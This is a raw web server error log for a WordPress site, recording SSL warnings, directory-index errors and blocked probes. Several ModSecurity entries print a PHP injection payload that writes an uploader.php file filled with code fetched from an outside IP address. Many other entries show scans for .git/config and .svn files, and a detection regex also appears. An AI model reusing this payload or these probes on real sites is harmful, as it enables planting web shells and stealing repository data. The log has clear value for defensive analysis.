(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jul 14 16:53:29.120763 2023] [autoindex:error] [pid 23016:tid 140065921492736] [client 20.150.137.169:34862] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 15 03:11:22.145554 2023] [ssl:warn] [pid 7230:tid 140264015288192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 15 03:11:24.530525 2023] [ssl:warn] [pid 7231:tid 140264015288192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 15 03:11:25.053321 2023] [ssl:warn] [pid 7231:tid 140264015288192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 15 03:11:27.441630 2023] [ssl:warn] [pid 7231:tid 140264015288192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 15 03:11:29.731238 2023] [ssl:warn] [pid 7772:tid 140227918264192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 15 03:11:32.053423 2023] [ssl:warn] [pid 7773:tid 140227918264192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 15 03:20:08.524696 2023] [:error] [pid 7800:tid 140227653920512] [client 40.83.62.98:35898] [client 40.83.62.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZLJWuAGC2AelTwvvTE9xUQAAAIE"], referer: www.google.com [Sat Jul 15 10:59:49.725737 2023] [autoindex:error] [pid 7799:tid 140227628742400] [client 20.225.230.10:58290] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 15 18:46:55.830869 2023] [autoindex:error] [pid 7799:tid 140227494459136] [client 192.185.82.202:50250] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Sat Jul 15 20:22:03.430024 2023] [autoindex:error] [pid 7798:tid 140227528029952] [client 104.214.58.61:54858] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jul 16 03:43:22.953072 2023] [ssl:warn] [pid 17538:tid 140404904322944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 16 03:43:27.152548 2023] [ssl:warn] [pid 17545:tid 140404904322944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 16 03:43:28.585999 2023] [ssl:warn] [pid 17545:tid 140404904322944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 16 03:43:30.339955 2023] [ssl:warn] [pid 17545:tid 140404904322944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 16 03:43:32.625243 2023] [ssl:warn] [pid 17994:tid 139896465885056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 16 03:43:38.905098 2023] [ssl:warn] [pid 17996:tid 139896465885056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 16 21:49:23.955231 2023] [:error] [pid 18205:tid 139896178063104] [client 20.97.17.24:48238] [client 20.97.17.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZLSsMzBKQCIgJuZ8yNtZawAAAMQ"], referer: www.google.com [Mon Jul 17 03:46:17.234874 2023] [ssl:warn] [pid 2250:tid 140174084233088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 17 03:46:21.414550 2023] [ssl:warn] [pid 2253:tid 140174084233088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 17 03:46:21.847208 2023] [ssl:warn] [pid 2253:tid 140174084233088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 17 03:46:23.496046 2023] [ssl:warn] [pid 2253:tid 140174084233088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 17 03:46:25.771634 2023] [ssl:warn] [pid 2701:tid 140705916598144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 17 03:46:32.009623 2023] [ssl:warn] [pid 2703:tid 140705916598144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/07/17 04:30:09 [error] 2683#2683: *363256 access forbidden by rule, client: 44.204.130.40, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" 2023/07/17 04:30:09 [error] 2684#2684: *363257 access forbidden by rule, client: 44.204.130.40, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" [Mon Jul 17 05:12:47.763019 2023] [autoindex:error] [pid 2820:tid 140705691891456] [client 20.125.138.115:43424] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jul 17 13:45:52.160089 2023] [:error] [pid 2723:tid 140705700284160] [client 20.230.111.96:41266] [client 20.230.111.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZLWMYNxMjtKzjGV734pkZwAAAAQ"], referer: www.google.com [Mon Jul 17 14:30:28.923358 2023] [autoindex:error] [pid 2724:tid 140705468966656] [client 92.204.223.27:43588] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Mon Jul 17 22:34:23.632015 2023] [:error] [pid 2724:tid 140705586464512] [client 20.230.111.96:46828] [client 20.230.111.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZLYIP90e4sJLa-gLOu9RGQAAAEk"], referer: www.google.com [Tue Jul 18 03:22:23.152400 2023] [ssl:warn] [pid 17105:tid 140704976250752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 18 03:22:29.414791 2023] [ssl:warn] [pid 17107:tid 140704976250752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 18 03:22:29.971923 2023] [ssl:warn] [pid 17107:tid 140704976250752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 18 03:22:32.126949 2023] [ssl:warn] [pid 17107:tid 140704976250752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 18 03:22:34.526432 2023] [ssl:warn] [pid 17612:tid 140651091703680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 18 03:22:40.862270 2023] [ssl:warn] [pid 17618:tid 140651091703680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 18 09:02:26.661998 2023] [autoindex:error] [pid 17934:tid 140650908960512] [client 178.128.172.0:50856] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php 2023/07/18 11:33:01 [error] 17593#17593: *434845 access forbidden by rule, client: 3.235.93.98, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" 2023/07/18 11:33:02 [error] 17593#17593: *434846 access forbidden by rule, client: 3.235.93.98, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" [Tue Jul 18 19:17:28.268484 2023] [autoindex:error] [pid 17934:tid 140650866996992] [client 185.229.224.193:56398] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/07/19 01:49:31 [error] 17594#17594: *470020 access forbidden by rule, client: 3.239.123.85, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" 2023/07/19 01:49:32 [error] 17594#17594: *470021 access forbidden by rule, client: 3.239.123.85, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" [Wed Jul 19 03:40:24.762366 2023] [ssl:warn] [pid 13121:tid 139862112761728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 19 03:40:31.031019 2023] [ssl:warn] [pid 13122:tid 139862112761728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 19 03:40:31.452498 2023] [ssl:warn] [pid 13122:tid 139862112761728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 19 03:40:32.906391 2023] [ssl:warn] [pid 13122:tid 139862112761728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 19 03:40:35.123495 2023] [ssl:warn] [pid 13566:tid 140024093550464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 19 03:40:41.462557 2023] [ssl:warn] [pid 13568:tid 140024093550464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 19 06:40:57.012738 2023] [autoindex:error] [pid 13808:tid 140023634515712] [client 104.214.58.139:44542] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jul 19 13:49:59.443970 2023] [autoindex:error] [pid 13588:tid 140023743620864] [client 104.214.58.61:44346] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jul 19 19:51:43.923691 2023] [:error] [pid 13808:tid 140023885629184] [client 20.7.24.10:36182] [client 20.7.24.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZLiFH0fc48SoJnlrwBiKMwAAAMM"], referer: www.google.com [Thu Jul 20 03:40:20.841396 2023] [ssl:warn] [pid 21902:tid 140188683114368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 20 03:40:23.173793 2023] [ssl:warn] [pid 21911:tid 140188683114368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 20 03:40:23.633786 2023] [ssl:warn] [pid 21911:tid 140188683114368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 20 03:40:25.283863 2023] [ssl:warn] [pid 21911:tid 140188683114368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 20 03:40:27.576660 2023] [ssl:warn] [pid 22327:tid 139856705677184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 20 03:40:31.910720 2023] [ssl:warn] [pid 22330:tid 139856705677184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/07/20 07:21:14 [error] 22307#22307: *537093 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /__MACOSX/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22307#22307: *537094 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /alpha/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22308#22308: *537095 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/v2/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22307#22307: *537096 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /aomanalyzer/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22308#22308: *537097 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22307#22307: *537098 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22307#22307: *537099 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22308#22308: *537102 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/admin/v3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22307#22307: *537101 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/user/v3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22307#22307: *537100 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/admin/v4/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22308#22308: *537103 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/user/v4/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22307#22307: *537104 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/admin/v1/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22308#22308: *537105 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/user/v1/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22308#22308: *537106 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /amphtml/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22307#22307: *537107 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /a/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22308#22308: *537108 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/user/v2/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:14 [error] 22308#22308: *537109 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/admin/v2/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537112 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /cms/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537113 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /build/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537159 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /v1/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537160 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /developer/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537162 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /img../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537161 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /s3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537163 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /v3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537164 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /samples/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537165 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /events../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22307#22307: *537166 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /static/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537110 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /blog/wp-content/themes/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537111 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/v1/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537115 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /repository/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537114 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /data/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537117 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /demo/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537119 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537116 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /repos/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537118 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/v3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537120 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /assets../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537121 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /flock/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537122 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /store/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537125 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /css../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537123 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /live/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537124 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /blog/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537126 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /backup/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537129 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /gateway/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537128 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537127 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537130 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /new/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537131 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /site/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: 